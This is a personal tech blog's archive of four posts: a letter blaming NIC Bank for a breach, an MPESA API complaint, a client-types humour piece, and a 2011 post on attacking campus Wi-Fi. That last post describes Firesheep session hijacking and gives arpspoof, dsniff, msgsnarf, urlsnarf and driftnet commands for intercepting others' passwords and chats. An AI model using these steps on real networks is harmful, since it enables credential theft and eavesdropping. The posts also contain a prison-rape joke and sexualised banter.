RSS

Tag Archives: HACK

NIC Bank’s Data Breach,Hack and subsequent Extortion

Allow me to write this post as a letter to NIC Bank, I feel  despite the numerous times I have advised them to rectify their security to better protect us,their users, its simply gone to deaf ears.Well here goes.

NIC

Dear NIC Bank,

How are you? Hope you are well. This days when I wake up every morning I have developed a routine I read all my tech blogs, check my email and check my NIC bank portal for fear of breach, for fear that my hard earned shillings may have been skimmed by some hungry hacker or even worse my data may have been sold on silk road. I know many wonder why am still banking with you if all I do is complain, I mean if you constantly argue with your spouse then its better walking out and sparing yourself the agony, but like a cocaine addict am hooked, am hooked to your seamless banking process, the short cues in banking halls, the cute banker chics you guys have, the asset finance and off course the online banking portal that has proved to be your Achilles heel.

If you have been reading my blog you may be aware I have written 2 posts the first one NIC-BANK’s poor Ebanking System and possible security Flaws dated 24th April 2014  and the second NIC-BANK’s improved Ebanking System subsequent to my Exposé  dated 11th November. In the first I alerted you of the gaping holes in your security.  I also expressed my fear that someone else may have found this flaw and not being as noble as me, exploited it for profit.  I was pleased when a few months later I noticed you had bumped up your security and added OTP to the online portal. But if you remember I mentioned that this may be a little to late, I wrote in part

To begin with if indeed the data they served was compromised they they should have purged the entire username password combo provided, instead they only solved the issue of passwords. The problem with this is a keen to a naked woman only covering her boobies, the rest of her is available for your ocular pleasure. The same applies if I had a set of pswd and usernames and the pswds change without the usernames changing then am already at first base if I had the old data. The next thing would be a clever combination of hacking tactics ranging from social engineering, actual key logging on the device to harvest the apps password and generating an OTP afterward, sitting on the data and joining all those IRC chats on the dark web and tor that list exploits on major brand software and the just cleverly generating the OTPs for your self etc

Fast forward to a couple of days ago, wifey called me up at work and informed me that there were a couple of guys arrested on the grounds of extorting cash for data. Allow me to speak a little about the 2 hacker guys, first I condemn heavily their extortion of money for data. The 2 guys asked for 200 bitcoins from this we can see this guys aren’t exactly noobs but also we can see that they are just average hackers. Allow me to explain why

There exists a market on the dark web, the other part of the internet where Google doesn’t even dare go, where all the hackers meet and chat exchange tools etc. I remember the first time I showed wifey the dark web she was blown away by the level of sophistication there, I mean if you think of the internet we use as  5/10  then the dark web is 10/10. This is the first place where kids grow up worshiping Anonymous and the Lulz, the place where lizard squad was born and their skills sharpened. Back to said market, its called Silk road, silk road buys anything from weapons to kiddie porn.Its like the wild wild west of the Internet. So Where am I going with this..allow me to indulge you and generalize as well. Kenyan Banks should be aware that there are guys out there who wont send you an email and ask for cash, there are guys who will sell hacked data, attack vectors etc on silk road and then from there the Chinese or Russians will get a hold of it and wreck havock, the things that this guys can do is even beyond the scope of this blog.

Long story short, the 2 guys will probably be found guilty right, they will end up in kamiti and get Anally raped and we will forget about the whole thing. One or two guys will get fired and new ones hired they will come with bravado and a big solex padlock to lock the server rooms. But do you think anything will be done.Look at the stock price following the hack, did it even dip a point,NO,look at the ques did they even shrink by a fraction,No.

This banks need to be monitored by the Central Bank, not only on banking practices but also on security,its all good that CBK protects your cash from fraudulent manipulation by the banks but that shouldn’t end there, they should protect Wanjiku from Chinese hackers who had a cluster setup in their house with enough brute force power to use said data hacked by the 2 to make them millions. Kenya has to wake up to the fact that the rest of the world has invested billions on cyber security and are still getting  hacked (look at sony,xbox etc) what do you think will happen when this hackers discover easy targets in Kenya/Africa? You will see several hacking rigs being setup and the smart ones wont even move from their desk, the 4 fiber connections to Kenya make remote hacks even easy.

So in parting NIC go ahead sentence them,sure cast stones on them but don’t forget you are to blame for what is happening/ what will happen

 

Advertisements
 
3 Comments

Posted by on January 16, 2015 in code, grad school, hack, idd sallim

 

Tags: , , , , , ,

The Elusive MPESA API that may never be…and More

mpesa-logo

Alot has been Blogged about the MPESA api…and when I say Alot am talking about 1000’s of tweets,blogs,texts etc. When The Late Idd Salim (It still hurts me to call him late) was around he delved endlessly into this. Everyone has talked about how Devs would be able to leverage said APIs into their systems  if Safaricom Just agreed to play Ball. But You all know safcom….safcom is like that pretty chic,big booty, titties from here to Ronga..the whole Package…The hardest thing is kuingisha  dame kama Huyu Box…I mean the typical point of approach would be “Waaa Msupa si umeiva..” But kwani you think its the first time she has heard this..off cource not she will just snob you and twerk that ass some where else. Same thing with Safcom we all approach them telling them the same thing..”aki safcom MPESA ni poa wacha tu code on it” And safcom will snob you. But even pretty chics get Lonely si ati they also dont want the D..kuna someone who will come with a new Different angle instead of cliche lines he will hit her with unxpected wordplay “Waa si I like your eyes,na si unajua Mwanamke ni Haga,why you have a small one??” and baam chic will  be disarmed nikama kufinya reset kwa system. Back to safcom someone actually ingishad them Box and build an API of sorts (Not new news really) I will get to that in a few

Ohh wait so Safcom just posted that MPESA is down as I write this for 2 days Runs to withdraw cash: *sigh*

CaptureMPESA

Back  to said API ,Bernsoft kitu last year sucessfully developed  a system for MPESA that makes MPESA transactions realtime – this is why when you pay DSTV your account gets reconnected immediately or when you deposit money to your bank from MPESA its realtime or why your KPLC payment is more realtime than it was before. They developed this system called “MPESA Instant Payment Notification (IPN) ” originally for use on Kenya Airways ticketing then presented it to Safaricom and they liked the idea thus opened up MPESA for us them to integrate with and so most if not all of MPESA Paybill /Buy Good Transactions are now processed through this locally developed system.

Many Local companies are Using this (I for one do most of my MPESA stuff primarily on said IPN) But this is Not full proof.For starters its Not exactly Bi Directional and requires Integral Integration with a Paybill Number. If you have ever tried getting one you will know its one of the hardest things ..hard because the tarrifs are a CLOSELY guarded and No one can know what say Comapy A pays.Meaning If you dev a system and you set up a contract with them you may be charged x and Company A gets charged y Where x>y and you cant do shyt about It.

But this was a great leap since it was the first( Ata Virgo haitikiangi kila siku after the first time, you have to give  her time to Digest the awesomeness of the D) hahaha…Moving along swiftly..The problem with Safaricom is that Saf cannot be both the owner of the platform and also the gate keeper of innovations that may run on it. All the Innovations Devs talk about  will not stop them from earning money by coming up with standard licensing fees. However and Important to Note it should not be up to them to decide which idea they like and therefore should run on a payment system. This is the same problem AT&T had because they simultaneously owned Bell Labs which churned out landmark software technologies, they could decide that a technology that seemed a threat would not run on their network yet they were virtually a monopoly the way M-PESA by market positioning is a virtual monopoly.The fact is we cannot let Safaricom  stifle innovation and continue to prosper. AT&T was finally split up in 1984 not because of its overwhelming market dominance, but that IT WAS REFUSING TO ALLOW NEW INNOVATIONS TO WORK ON ITS PLATFORMS thus overall stifling technology.

There are thousands of programmers who could come up with software or games that could seamlessly integrate M-PESA as a payment platform for their services without having to go through an approval process where Safaricom technical people are the judges and jury particularly given the integrity issues that have long been raised of these Safaricom IT guys when it comes to dealing with developers.

Another key thing of Note if Safaricom will ShutDown MPESA today (11:00pm Saturday 9th November to 6.00a.m on Sunday 10th November) will this rumpant outages not cost the economy? 35% of our Kenyan GDP passes through M-PESA when there is no credible redundancy.That if MPESA is out of a week the economy stagnates? Potential systemic risks such as banking systems heavily exposed to one economic sector are heavily discouraged and neither should we say our national transactions are 35% exposed to one payment system and be happy about it.A system which No one but a select few know anything about

As Salim would Say: Wazi Back To code

 
3 Comments

Posted by on November 9, 2013 in Uncategorized

 

Tags: , ,

Type of Code Clients I have met

So someone accused me of only writing about code this and code that, nimaka unaweza peleka Code Nakumatt upatiwe shopping au Butchery ya Kamau akukatie ka Nyama Nusu…of course not, there has to  be business involved or in the words of Uhuru Kenyatta, willing buyer willing seller…so today I will just talk a little bit about the two types of willing buyers I know/ have had the experience of working for.

I have been taught by time and of course by more seasoned business men to divide clients into two broad yet true categories: Clande/chips funga and Girlfriend/wifey

1.Clande/chips Client.

film_pick_up_line_801085

The name speaks for itself, this type is the tap and go…No strings attached no Numbers no natsing. Usually this is my best type of client since everyone goes home happy. A clande Client knows point blank what they want, and how they want it. They are straight forward, utapatiwa spec doc yako,depo na time line. Utafanya Kazi, ukimaliza UAT kiasi. bass…the story ends there final Installment paid and you both go home happy. In the event hamskizani, you both have the luxury of walking away since you just met and nothing has been invested yet in between the two of you.

The Good thing about this type of client is just like a clande kwa bar uko guaranteed not to sleep hungry . Its cash at hand so you are happy,your landlord is happy and even the real Clandes are happy. Moving along

2.Girlfriend/wifey Client

art-cartoon-couple-cute-drawing-heart-Favim.com-48970

Sasa huyu ni ule wa long term…yaani in other words ata sio Strings attached ni more like ropes.This is the worst client ever. Let me explain using the analogy of a real world Girlfriend. You meet a hot mama, someone you think is a keeper…unaanza courtship. if you take that leap of faith you should know you will be in it for the long haul,during which anaweza amua hakuvunjii (utaka nja baba)…the only thing you get are hugs and smonches…you will have to be there for her 24/7(kama customer care)..handling all her Hormonal maneno and stuff……you get the picture.

Back to the client, you meet a big client <usually some corporate or Gov deal> una strike ka deal nao ,depo labda 30% unapatiwa kazi inaanza….1 month in system changes zimeanza,sijui integration na system flani wanatumia,2 month HR wanataka module yao…una call meeting…”hii haikuwa kwa spec doc…bla bla bla” wanakuangalia “How much more will it cost us” una peana figure…na ju uko na Njaa 20% unapewa,una endelea na code…3 months later huna rent,dame yako ana kuagalianga asubuhi ana skia Nausea ju huna any..zako ni “Ngoja niko karibu kulipwa” …they drag payment…na the day they actually give you your loot ni Friday Jioni na ni cheque ita take 3 days ku mature kwa hivyo tuseme next week Thursday ndo utakuwa monied. DAFAQ

All the while hiyo monday next wana kuambia you drive to their place to sort some stuff out, nikama walikupatia fuel card  ya kutumia. The Girlfriend client will also catch feelings if there is a bug “aki na vile tume kulipa vipoa..” This are the clients who will ask for refunds/sue you/want you in the office every week etc.

Any who those are my two categories of clients. Hope one of you out there can relate.

In other news if you haven’t yet tried PesaBox here is the link>>, and here is a brief Wiki entry of how it works/what it does.

 

 
Leave a comment

Posted by on April 5, 2013 in code, hack, Humour

 

Tags: , , , ,

Hacking WI-FI ya JKUAT.

I get scared at times….not of cliche things like of the dark or of being shot by the cops because I come from one of those neighborhoods.What scares me most is cyber attack….This is going to be a tech post so if you  not into that kind of thing please click here>>>>

That being said let me  dive head fist into the contents.I am a wi-fi junkie… I spend more time online than I do with my girlfriend,Wi-fi has been good to me(when its not that time of the month when it gets all hormonal)…So why am I afraid???

Well lets just take it from the top…I share an access point with some 100 or so guys at peak and 4-5 at off peak,the commonest site visited is Facebook, YouTube and probably Yahoo(I didn’t mention Google coz it goes without say).Peak time is usually from 7-10Pm and off peak ranges from there..The wi-fi network is protected with a  WPA2  security pass and AES encryption format(not TKIP)..The network is behind a proxy server that runs SQUID..and what do we all know about squid??? Squid sacks at HTTPS (ad rather go for an ISA server but then again am not JKUAT,i only go to school there)

Sasa Jaymo ju umetuambia hii yote,how does an attack occur?.kwanza this is purely for educational  purposes.one of  the easiest attacks is using a lilttle known tool called firesheep.Ok firesheep is fa***** easy to use,.Primarily coz its not a stand alone software rather a firefox addon…With this nifty addon you can do a tonne of things to rookie web users…wanna hear like what?

Supposing student x logs on to an acess point say RUNDA wireless connection.The DHCP awards him a renewable 1 hour lease on an IP(all without him knowing) and he establishes an Internet connection.He is just from chatting with this fresha chic who gave him her Facebook handle,so student X wants to snoop…He launches his Mozilla and types the URL,seconds later the login page appears,he logs in and continues doing his thing…pretty standard right???? Well across the yard Hacker X launches his Firesheep and begins this hack..he notices Student X is logged onto Facebook via HTTP instead of HTTPS..and decides to steal his session…does kidogo of this and that….minutes  later he has the exact facebook session as student X..while he is at it he even decides to go through this nygas Inboxes to see if he is still dating that gorgeous chic of his…If thats not scary enough,he goes to Facebook settings,changes the backend Email adress and Facebook password..logs out and kicks Student X out of his own fa**** facebook page….awsome.

How is this being done…session Hijacking…What all WI-FI networks have in common is that people will acess them to browse(daaaaaa) and when they do some one can easily steal unencrypted cookie sessions.session hijacking is the exploitation of a valid computer session—sometimes also called a session key—to gain unauthorized access to information or services in a computer system. In particular, it is used to refer to the theft of a magic cookie used to authenticate a user to a remote server(SQUID in my case)

Hiyo ni moja..next bucket-brigade attack…aka man-in-the-middle-attack.This is what good old wikipedia has to say about bucket bridge attack. This is an attack where the attacker makes independent connections with the victims and relays messages between them, making them believe that they are talking directly to each other over a private connection, when in fact the entire conversation is controlled by the attacker. The attacker must be able to intercept all messages going between the two victims and inject new ones, which is straightforward in many circumstances (for example, an attacker within reception range of an unencrypted      Wi-Fi wireless access point, can insert himself as a man-in-the-middle).

And since am in a good mood today am going to give you a proff of concept that I actually tried out….First Am usually working on a linux distro called Bactrack….(sorry windows slaves,windows cant hack..f*** what you see in the movies).

So open up a shell and get the tools you want primarily we are going to be doing  arpspoof poisoning and so we need to get driftnet and dsniff.

So on bash run:-sudo apt-get install driftnet dsniff. next we enable packetforwading…echo 1>  /proc/sys/net/ipv4/ip_foward   then cat /proc/sys/net/ipv4/ip_foward  this is to allow the traffic on the network to flow via your machine…then we begin the arpspoff poisoning

sudo arpspoof -t <your ip> <router ip>  split your screen and do the reverse sudo arpspoof -t <router ip> <your ip> . And that’s it,you are primarily the man in the middle here.Now you can have fun  with this attack…

an easy one is:

 msgsnarf -i etho, where etho is the name of the network interface..you can listen to all the instant message services running,am talking MSN,gtalk…any instant messanger.so you can watch someone chatting.

urlsnarf -i -etho, Listens to port 8080,80,3128,if you in JKUAT and you use wi-fi then you must know what port 3128 is.This one obviously listens to URL that are being sent.

If you are intersted in password then we can go back to dsniff and do that

sudo dsniff -i eth0, this will listen to any password being sent.

Now if you want to see what Student X is viewing online,kama picha hivi then we switch back to driftnet

sudo drifnet -i -eth0,  this will give you a visualization of activity on the network

Bassss thats why i get afraid…but no biggie…In my next post i will tell you how to protect yourself from and of the above attacks….wacha nikasomee CAT ya fluidmechanics

 
7 Comments

Posted by on September 28, 2011 in hack, INTERNSHIP, JKUAT, true stories

 

Tags: , , ,